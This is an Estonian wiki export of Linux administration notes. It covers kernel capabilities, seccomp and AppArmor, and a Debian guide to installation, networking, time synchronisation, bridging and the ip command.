root@kernel-deb-13-01:/sys/kernel/tracing# cat trace | head -n 15
# tracer: function
#
# entries-in-buffer/entries-written: 1458/1458 #P:32
#
# _-----=> irqs-off/BH-disabled
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / _-=> migrate-disable
# |||| / delay
# TASK-PID CPU# ||||| TIMESTAMP FUNCTION
# | | | ||||| | |
hwclock-1525 [003] ..... 10443.012235: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012346: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012425: efi_read_time <-__rtc_read_time
</pre>

kus

* hwclock käsk antakse ja küsitakse tema pid väärtust
* trace failis on fikseeritud pid mis oli seotud efi_read_time funktsiooni väljakutsumisega

===netconsole===

TODO

===Kasulikud lisamaterjalid===

* [[:Operatsioonisüsteemi Debian GNU/Linux paketihalduse kasutamine]]
* http://www.debian.org/security/
* http://www.debian-administration.org/
* http://wiki.debian.org/
* http://www.debian.org/distrib/packages
* http://debian.org/doc/maint-guide
* http://www.debianadmin.com/
* http://debian.catsanddogs.com/
* http://debconf9.debconf.org/ - sisaldab videosalvestusi Debiani arendajate esinemistest DebConfidel
* http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/lenny/current/
* http://debian-live.alioth.debian.org/
* http://www.emdebian.org/

Linux kernel kontrollib tegevusi

2026-05-03T22:44:47Z

Imre: /* Capabilities - 2026 kevad märkmed */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===Kasulikud lisamaterjalid===

* TODO

Operatsioonisüsteemi Debian GNU/Linux kasutamine

2026-05-03T22:44:06Z

Imre: /* Capabilities - 2026 kevad märkmed */

===Debian GNU/Linux===

Debian GNU/Linux ehk lühidalt Debian on vaba operatsioonisüsteem, mis kasutab Linux või FreeBSD tuuma ning töötab paljudel populaarsetel riistvaralistel platvormidel, sealhulgas 32 bit ja 64 bit x86 arvutid.

Debiani sobib kasutada nii serveritel kui ka töökohaarvutitel sh süleritel. Debianile on iseloomulik

* korrektselt ilmuvad turvaparandused (teated ilmuvad ka bugtraqis)
* eeskujulik paketihaldus, sh automaatne pakettide autentsuse valideerimine kontrollsummade abil (MD5sum, SHA1, SHA256)
* rahulik stabiilsete versioonide ilmumise tsükkel, erinevalt närvilisest ja suhteliselt pikk tugi eelmisele stabiisele versioonile
* väärikas kasutajaskond (ingl. k. community)
* tarkvara jagatakse kompileeritud ja lähtetekstipakettide kujul

Debiani kodulehe http://www.debian.org/ tiitel ütleb, et tegemist on universaalse operatsioonisüsteemiga, mille tunnistuseks on ehk tõepoolest asjaolu, et Debiani on kasutatud mitmete teiste nn Linuxi distributsioonide aluseks.

Debian on loodud Ian Murdock'i poolt aastal 1993, kusjuures operatsioonisüsteemi nimi on tuletatud autori ja tema abikaasa Debra eesnimedest.

===Operatsioonisüsteemi paigaldamise ettevalmistamine===

Debiani kasutamiseks on vajalik sobiv riistvara, näiteks tõenäoliselt praktiliselt suvaline 32 bit või 64 bit x86 arvuti sobib, alatest 486 PC mudelitest kuni HP DL 585 G5 ja IBM x3250 taoliste serveriteni. Riistvara sobivuse määrab põhiliselt operatsioonisüsteemi tuum, 2013 aastal on stabiilsel Debiani versioonil 7.0 selleks Linux tuuma versioon 3.2.0.

Lisaks tuleks enne operatsioonisüsteemi paigaldamist otsutada, mida arvutiga teha soovitakse, sh võiks kujutada ette milline saab olema

* arvuti nimi ja ip aadress
* kõvaketaste kasutus
* kas arvutit kasutatakse serveri või töökohana
* kuhu arvuti füüsiliselt paigutatakse
* kes vastutab arvuti haldamise eest (tarkvara uuendamine, süsteemi monitoorimine ja varundus/taaste)

Üks otsekohene moodus operatsioonisüsteemi paigladmiseks on kasutada Debiani peeglites (ingl. k. mirror) jagatavat CD tõmmisest valmistatud bootivat CD plaati, kuna kõige populaarsem platvorm on x86, siis märgime, et

* 64 bit AMD ja Inteli arvutitel kasutamiseks sobib Debiani amd64 arhitektuur
* 32 bit AMD ja Inteli arvutitel kasutamiseks sobib Debaini i386 arhitektuur

Kuivõrd reeglina AMD ja Inteli 64 bit arvutid on 32 bit-ühilduvad, siis kasutades 32 bit operatsioonisüsteemi tarkvara 64 bit riistvaral käitub arvuti nagu 32 bitine arvuti. Kuigi eelpool on mainitud nimeliselt AMD ja Intelit kehtib öeldu ka teiste tootjate x86 platvormide kohta. Järgnevas on näited toodud konkreetsuse huvides 64 bit keskkonna kohta, kuid põhimõtteliselt toimub tegevus samamoodi ka 32 bit keskkonnas toimetades. Lisaks saab valida mitmete nö eriotstarbeliste tuumade hulgast, nt i386 non-pae, tuuma nimes kasutatakse '486' sel juhul.

Niisiis, kui kasutada on 64 bit x86 riistvara tuleks kopeerida esimene amd64 arhitektuuri CD tõmmis, näiteks aadressilt http://cdimage.debian.org/debian-cd/7.0.0/amd64/iso-cd/debian-7.0.0-amd64-CD-1.iso ning kirjutada CD plaadile. Plaadi kirjutamisel peab jälgima, et tõmmist ei kirjutata plaadile mitte nagu suurt faili, vaid kirjutatakse tõmmisena, vastasel korral arvuti ei boodi sellelt plaadilt. Debian v. 7.0 on rangelt eristatud vabad ja suletud koodiga draiverid, kõige nähtavamalt mõjutab see tõenäoliselt operatsioonisüsteemi paigaldamise protseduur kui on tegemist vastava riistvaraga, http://www.debian.org/releases/stable/amd64/ch06s04.html.en.

USB pulgalt paigaldades tundub, et uuemal ajal on .iso tõmmised nii ettevalmistatud (isohybrid techniques), et need saab lihtsalt dd programmiga kopeerida pulgale ja töötab, https://wiki.debian.org/BootUsb

# dd if=/tmp/debian-7.0.0-amd64-CD-1.iso of=/dev/sdc bs=4M

Kui Debian paigaldatakse arvutile, kus juba on operatsioonisüsteem installeritud, nt Win7, siis tõenäoliselt õnnestub installeriga töötamise ajal Win7 failisüsteemide ja partitsioonide suurusi kahandada, tehes nii ruumi Debiani jaoks. Selleks tuleb kõvaketta seadistamise menüüvalikus öelda 'Manual' ja sealt edasi. Kirjanduse põhjal saab öelda, et vastvaid NTFS failisüsteeme ei ole tarvis eelnevalt defragmenteerida.

Windows operatsioonisüsteemi all sobib USB pulk tekitada UUI (Universal USB Installer) programmiga, mille kasutamise juhised leiab aadressilt http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

===Operatsioonisüsteemi paigaldamine===

Tuleb arvestada, et operatsioonisüsteemi paigaldamisel hävivad eelnevalt kõvaketastel olnud andmed. Peale paigaldusmeedialt arvuti käivitamist käivitatakse automaatselt operatsioonisüsteemi installer, mis näeb tekstrežiimis välja selline (alternatiivina esineb installeri kasutajaliides ka graafilises vormis)

[[Pilt:Debian-installer-v7.gif]]

Installeri kasutamine on intuatiivne, paigaldamise tulemusena tekib iseseisvalt bootiv arvuti. Paigaldamise käigus sooritatakse järgmised otsustused ja tegevused

* kõvaketakste kasutamine
* võrguseadistused
* tarkvarakomplekti valik (standard, töökoht, server)
* juurkasutaja parool
* paigaldatakse alglaadur (ingl. k. bootloader) GRUB

Peale paigaldamist saab arvutisse konsoolilt sisse logida ja teatatakse midagi sellist

Linux loomaaed 2.6.26-2-xen-686 #1 SMP Wed May 16 23:50:09 UTC 2009 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 29 23:06:53 2009 from aix.auul
mart@loomaaed:~$

Oluline on tähale panna, et muu hulgas räägib Debian oma kasutustingimustest

* Debian GNU/Linux süsteemis sisalduv tarkvara on vaba tarkvara
* Debian GNU/Linux süsteemil kasutamisega ei kaasne garantiid

Paigaldamise lõpus küsitakse, kas on soov osaleda nn populaarsus-võistluses, kord nädalas hakkab arvuti saatma paigaldatud pakettide nimekirja arendajatele, tulemused avaldadakse aadressil http://popcon.debian.org/.

===Operatsioonisüsteemi paigaldamine üle serial konsooli===

Serial konsooli eksitab splash, sellest saab lahti vajutades Esc. Seejärel tuleb sisestada

boot: install console=ttyS0,9600

===Community===

Debian GNU/Linux osas suhtlemiseks või niisama tutvumiseks saab kasutada selliseid ressursse

* Veebikoht - http://www.debian.org/
* Wiki - http://wiki.debian.org/
* Postiloendid asuvad aadressil http://lists.debian.org/
* Uudised - http://www.debian.org/News/project/
* Turvaparandusi puudutavad teadaanded - http://www.debian.org/security/

===Operatsioonisüsteemi varundamine ja taaste===

Operatsioonisüsteemi varundamiseks sobib kasutada programmi rsync kopeerides kogu failisüsteemi va kataloogid

* /tmp
* /proc
* /sys

teisele arvutile.

Süsteemi taastamiseks tuleb arvuti bootida nt RIP-Linuxi CD plaadilt, seadistada võrk, kopeerida varundatud süsteem ja paigaldada bootloader.

===IP aadress===

Staatilise IP aadressi saab Debianile seadistada failist

/etc/network/interfaces

Tüüpiliselt võiks see välja näna järgnev

# The loopback interface
auto lo
iface lo inet loopback

# The first network card - this entry was created during the Debian installation
# (network, broadcast and gateway are optional)
auto eth0

iface eth0 inet static
address 192.168.1.10
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

===Arvuti nimi ja resolver===

Arvutil peab oleme korrektselt seadistatud nimi ning nimesüsteemi kasutamine. Arvuti nimi on kirjas failis /etc/hostname, näiteks

bassein

ning failis /etc/hosts on kirjas nö staatiline nimelahendus, mis töötab päri-ja pöördteisenduse jaoks, lihtsal juhul on seal sellised read (kusjuures esimest rida tuleb kasutada sõna-sõnalt)

127.0.0.1 localhost.localdomain localhost
192.168.1.20 bassein.loomaaed.tartu.ee bassein

Peale nende failide sisu muutmist tuleb muudatuste kehtestamiseks öelda

bash# hostname bassein

Õnnestunud muudatuse kinnituseks ütleb arvuti nii

bash# hostname
bassein
bash# hostname -f
bassein.loomaaed.tartu.ee

Selleks, et arvuti lahendaks muid nimesid, peab olema kirjas nimeserveri aadress failis /etc/resolv.conf

nameserver 192.168.1.254

Kusjuures, kui failis /etc/resolv.conf kasutada mitut sellist rida erinevate nimeserverite aadressidega, siis proovitakse igal nimelahendusel neid järjest läbi kuni jõutakse esimese töötavani. Vaikimisi oodatakse vastust 5 sekundit. Täiendavat infot saab resolveri manuaalist öeldes

# man resolver

Tihtipeale kasutatakse keskkonnamuutujat PS1 prompti kujundamiseks ja mille väärtuse moodustamisel kasutatakse omakorda käsku hostname. Seetõttu muutub promptis oleva arvuti nime väärtus peale välja ja uuesti sisselogimist.

====resolvconf====

Lenny sisaldab lisaks nö staatilisele resolverile dünaamilist resolvconf tarkvara, asjakohane allikas on aadressil http://wiki.debian.org/NetworkConfiguration

Tarkvara paigaldamiseks tuleb öelda

# apt-get install resolvconf

Osa olulisi faile asub kataloogis

/etc/resolvconf

resolvconf oskab /etc/network/interfaces failist kasutada dns-nameservers parameetrit, nt selliselt

...
auto eth0
iface eth0 inet static
address 192.168.10.199
gateway 192.168.10.254
netmask 255.255.255.0
broadcast 192.168.10.255
dns-nameservers 192.168.10.254

===Kellaaeg===

Arvuti kellaaeg on korrektselt juhul kohalik aeg. See sõltub ajavööndi seadistusest, mis võiks Eestis olla

# ls -l /etc/localtime
lrwxrwxrwx 1 root root 34 Jul 15 21:40 /etc/localtime -> /usr/share/zoneinfo/Europe/Tallinn

Vajadusel tuleks eemaldada /etc/locatime ja öelda

# ln -s /usr/share/zoneinfo/Europe/Tallinn /etc/localtime

Seadistamiseks sobib kusjuures kasutada pigem ehk utiliiti dpkg-reconfigure öeldes

# dpkg-reconfigure tzdata

====Kellaaja esitamine ja seadistamine programmiga date====

Töötava süsteemi käest saab küsida aega öeldes

$ date
Sat Jan 8 14:07:25 EET 2011

Lisaks saab küsida nt nö kaks nädalat tagasi, sellest on vahel kasu nt varundamisega seotud skriptides

$ date -d "2 weeks ago"
Sat Dec 25 14:07:25 EET 2010

====Kellaaja esitamine ja seadistamine programmiga rdate====

Openrdate http://sourceforge.net/apps/mediawiki/openrdate on OpenBSD projekti rdate tarkvara port Linuxile. Tarkvara paigaldamiseks tuleb öelda

# apt-get install rdate

Kellaja ühekordne seadmine toimub öeldes

# rdate ajaserver.loomaaed.tartu.ee

rdate võimaldab suhelda kahte tüüpi ajaserveritega

* http://tools.ietf.org/html/rfc868 server - tavaliselt töötab inetd abil ja teenindab portidel 37/tcp või 37/udp
* http://tools.ietf.org/html/rfc2030 - tavaliselt töötab pordil 123/udp

rdate võtmetega saab juhtida, millist režiimi klient parasjagu kasutab, nt

$ rdate -4 -p -n ntp.ut.ee
Sat Jan 8 14:09:44 EET 2011

kus

* -4 - IPv4 protokoll
* -p - ainult küsida aega ja mitte seadistada
* -n kasutada rfc2030 ajaserverit

Vaikimisi pöördub rdate ajaserveri poole kasutades rfc686 protokolli ja 37/tcp porti.

====Kellaaja esitamine ja seadistamine programmiga ntpdate====

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ntpdate

ntpdate sobib kellaaja küsimiseks rfc2060 protokolli toetavalt serverilt (kasutades 123/udp porti) ning kohaliku süsteemi kellaaja seadmiseks. Ainult kellaaja küsimiseks sobib kasutada võtit -q

$ ntpdate -p 2 -q ntp.ut.ee ntp.aso.ee
server 2001:bb8:2002:500:211:25ff:fe8f:7d64, stratum 2, offset 0.011371, delay 0.10133
server 193.40.5.113, stratum 2, offset 0.000782, delay 0.03786
server 195.80.105.226, stratum 1, offset 0.000217, delay 0.03523
8 Jan 15:35:55 ntpdate[20870]: adjust time server 195.80.105.226 offset 0.000217 sec

kus

* -p 2 - igalt toodud ajaserverilt küsitakse aega kaks korda
* -q - aega ainult küsitakse ja ei seadistata
* vastust küsitakse kolmelt ajaserverilt kuna ntp.ut.ee nimel on A ja AAAA kirjed

Algupärane ntpdate programm ise ei kasuta ühtegi seadistusfaili, kuid Debian keskkonnas on lisaks programm ntpdate-debian, mida juhib seadistusfail /etc/default/ntpdate mille abil saab juhtida, milliseid ajaservereid kasutatakse. Vaikimisi on seadistatud rida

NTPDATE_USE_NTP_CONF=yes

mis tähendab, et kasutatakse ajaservereid ntp paketi tarkvara seadistusfailist /etc/ntp.conf. Kui ntpd programm töötab, siis ntpdate keeldub aega seadmast.

====Kellaaja esitamine ja seadistamine tarkvaraga ntp====

Kellaaja sünkronisseerimiseks sobib kasutada paketti ntp

# apt-get install ntp

NTP tarkvara juhivad kaks seadistusfaili

* /etc/default/ntp - milles sisaldub vaikimisi rida ja mis tähendab, et ntpd programmi käivitamisel seadistatakse kellaaeg nö kiiresti

NTPD_OPTS='-g'

* /etc/ntp.conf - seadistusfail, kus näidatakse ajaserverid jms parameetrid

Seadistusfailist /etc/ntp.conf tuleb leida read

server 0.debian.pool.ntp.org
server 1.debian.pool.ntp.org
server 2.debian.pool.ntp.org
server 3.debian.pool.ntp.org

ning soovi korral asendada need oma teenese pakkuja nime kasutava ühe reaga, nt

server ajaserver.loomaaed.tartu.ee

Kulub mõni aega, nt 10 minutit kuni ntp töötamine stabiliseerub, sellest annab tunnistust, et ntptrace vastab kus arvuti asub ntp hierarhias, nt midagi sellist

# ntptrace -n
127.0.0.1: stratum 3, offset -0.001927, synch distance 0.038145
192.168.30.8: stratum 2, offset -0.000066, synch distance 0.020106
192.168.30.15: stratum 1, offset 0.000010, synch distance 0.002270, refid 'GPS'

võib ka küsida sarnaselt (see väljund ei ole eelmisega näitega kooskõlas)

# ntpq -np
remote refid st t when poll reach delay offset jitter
==============================================================================
10.192.0.53 193.40.5.113 3 u 47 64 37 0.646 -22.260 73.828

====Kellaaja esitamine ja seadistamine tarkvaraga openntpd====

ntp tarkvarale on populaarne alternatiiv openntpd, üks praktiline erinevus on nt selles, et ntp sisaldab ntptrace utiliiti. OpenNTPD ei sisaldu Debian Squeeze paketihalduses.

====Märkused====

Selleks, et Xen domU kellaaega mõjutaks domU sees töötav ntp server tuleb öelda

bash# sysctl -w xen.independent_wallclock=1

või lisada faili /etc/sysctl.conf rida

xen.independent_wallclock=1

Leap sekundite käsitlemine toimub tavaliselt kahel võimalikul viisil

* lisatakse äkki sekund ära

# dmesg
..
[14255112.244045] Clock: inserting leap second 23:59:60 UTC

* määritakse sekundi lisandumine pikema perioodi peale

===Võrgu seadistamine seadistusfailidega===

Võrguseadmete seadistamine toimub faili /etc/networks/interfaces abil. Selle faili sisu alusel kehtestatakse võrguseadistused arvuti alglaadimisel või öeldes arvuti töötamisel

# /etc/init.d/networking restart

Failis saab kasutada sellised sektsioone

====lo ja eth võrguseadme seadistamine====

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.10.10
gateway 192.168.10.254
netmask 255.255.255.0

====dummy võrguseadme seadistamine====

auto dummy0
iface dummy0 inet static
address 192.168.13.251
netmask 255.255.255.0
network 192.168.13.0
broadcast 192.168.13.255

Kui on soov kasutada enam kui ühte dummy seadet, tuleb laadida dummy moodul sarnaselt

# modprobe dummy numdummies=5

VLAN kasutamist tutvustatakse punktis http://kuutorvaja.eenet.ee/wiki/VLAN_kasutamine#Linux.27i_kasutamine_mode_trunk_re.C5.BEiimis

===Silla kasutamine===

Silla (ingl. k. bridge) kasutamine toimub paketis bridge-utils utiliitidega, paigaldamiseks tuleb öelda

# apt-get install bridge-utils

Nt tekitame silla eth1 ja tap0 seadmetega

# brctl addbr br0
# brctl addif br0 eth1
# brctl addif br0 eth2

Silla omadusi saab küsida öeldes

# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.00064f320035 yes eth1
eth2

Silla kasutamiseks peavad olema seadmed üleval, nt silla üles tõstmiseks tuleb öelda

# brctl br0 up

Silla saab eemaldamiseks tuleb sild alla lasta, eemaldada seadmed ning lõpuks sild

# brctl br0 down
# brctl delif br0 eth1
# brctl delif br0 eth2
# brctl delbr br0

Sillale saab seadistada ka ip aadressi, nii nagu paljudele muudele võrguseadmetele

# ifconfig br0 192.168.1.200 netmask 255.255.255.0

Tulemusena paistab

# ifconfig br0
br0 Link encap:Ethernet HWaddr 00:17:42:02:0b:8a
inet addr:192.168.1.250 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5c63:deff:fe92:e125/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:38 errors:0 dropped:0 overruns:0 frame:0
TX packets:17 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2008 (1.9 KiB) TX bytes:3101 (3.0 KiB)

kusjuures bridge mac aadressina kasutatakse vaikimisi kõige väiksemat mac aadressi bridge külge ühendatud seadmetest, st see aadress võib muutuda bridge töötamise käigus. mac aadressi saab ka muuta, nt

# ifconfig br0 hw ether 70:01:68:00:12:50

STP (Spanning Tree Protocol) sisselülitamiseks tuleb öelda

# brctl stp br0 on

ja silla STP info esitamiseks

# brctl showstp br0
br0
bridge id 8000.00064f320035
designated root 8000.00064f320035
root port 0 path cost 0
max age 20.00 bridge max age 20.00
hello time 2.00 bridge hello time 2.00
forward delay 15.00 bridge forward delay 15.00
ageing time 300.01
hello timer 1.49 tcn timer 0.00
topology change timer 0.00 gc timer 5.49
flags

eth1 (1)
port id 8001 state disabled
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8001 forward delay timer 0.00
designated cost 0 hold timer 0.00
flags

eth2 (2)
port id 8002 state forwarding
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8002 forward delay timer 0.00
designated cost 0 hold timer 0.48
flags

kust on näha, et

* antud juhtumil on silla üks komponent välja lülitatud

Sillaga seotud mac aadresside esitamiseks tuleb öelda

# brctl showmacs br0
port no mac addr is local? ageing timer
2 00:06:4f:32:00:35 yes 0.00
1 00:06:4f:63:e3:d7 yes 0.00
2 00:0c:42:07:1a:45 no 0.04
2 00:16:3e:00:00:01 no 83.98
2 00:1c:c0:38:89:07 no 22.58
2 70:01:68:00:11:45 no 227.43
2 70:01:68:01:02:49 no 33.48

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Bridging_(networking)
* http://tldp.org/HOWTO/BRIDGE-STP-HOWTO/index.html
* http://en.wikipedia.org/wiki/Spanning_tree_protocol
* http://en.wikipedia.org/wiki/LAN_switching
* http://backreference.org/2010/07/28/linux-bridge-mac-addresses-and-dynamic-ports/

===Võrgu seadistamine programmiga ip===

Programm ip võimaldab Linuxi kaasaegsetes 2.4 ja 2.6 tuumades sisalduva võrguliideste toega oluliselt paindlikumalt ümber käia
kui ifconfig. Näited käsudest, mida on ohutu anda töötavas masinas.

====Seadmed====

# ip link show
1: lo: mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:26 brd ff:ff:ff:ff:ff:ff

====Seadme aadressid====

Aadresside esitamine

# ip address show eth1
3: eth1: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:d3 brd ff:ff:ff:ff:ff:ff
inet 10.0.6.5/24 brd 10.0.6.255 scope global eth1
inet 10.0.6.6/24 brd 10.0.6.255 scope global secondary eth1:1

====Ruuting====

Ruutingute esitamine

# ip route show
10.0.5.0/24 dev eth3 proto kernel scope link src 10.0.5.1
10.0.6.0/24 dev eth0 proto kernel scope link src 10.0.6.1
...

Ruutingu lisamine

# ip route add 192.168.10/24 dev eth0

Ruutingu eemaldamine

# ip route del default via 10.0.14.1 dev eth0

====Misc====

Näited kästudest, mida on ehk ohutu anda töötava masina kasutuses mitte olema võrguseadme suhtes

# ip addr add 100.100.100.4/16 dev eth4
# ip addr del 100.100.100.4/16 dev eth4

nn ifconfig'i aliased

Osade teadlaste arvates on see tänapäeval täiesti igand rääkida ethx:x aliastest. Et lihtsalt saab seadmele omistada mitu aadressi ja kogu lugu. Kui aga on juhtunud selline õnnetu lugu, et seadmel on nt eth0:1 aadress, siis saab seda eemaldada lihtsalt sedasi

# ip addr del 195.80.96.214 dev eth0

===Java kasutamine===

Java ehk JVM (Java Virtual Machine) tarkvara kasutamiseks on Debianis mitmeid võimalusi. Kui on kavatsus jääda paketihaldusest paigaldatud tarkvara kasutamise juurde, siis tõenäoliselt on otstarbekas lasta paketihaldusel töötada ja kasutada Debiani Java pakette. Kui aga kasutatakse mingit eraldiseisvat tarkvara, nt Tomcat, GlassFish vms Java rakendusserverit, siis on ehk otstarbekas kasutada http://java.sun.com/ veebikohast kopeeritud Javat.

====Java kasutamine paketihaldusest====

Debiani Lenny paketihalduses on olemas sellised Java kompilaatorit sisaldavad Java implementatsioonid

$ aptitude search "?provides(java-compiler)"
p gcj - The GNU Java compiler
p gcj-4.2 - The GNU compiler for Java(TM)
p gcj-4.3 - The GNU compiler for Java(TM)
p jikes-classpath - clean room standard Java libraries - wrapper for jikes
p jikes-kaffe - Wrapper for jikes using Kaffe classes
p kaffe-jthreads - A green threads enabled version of the Kaffe VM
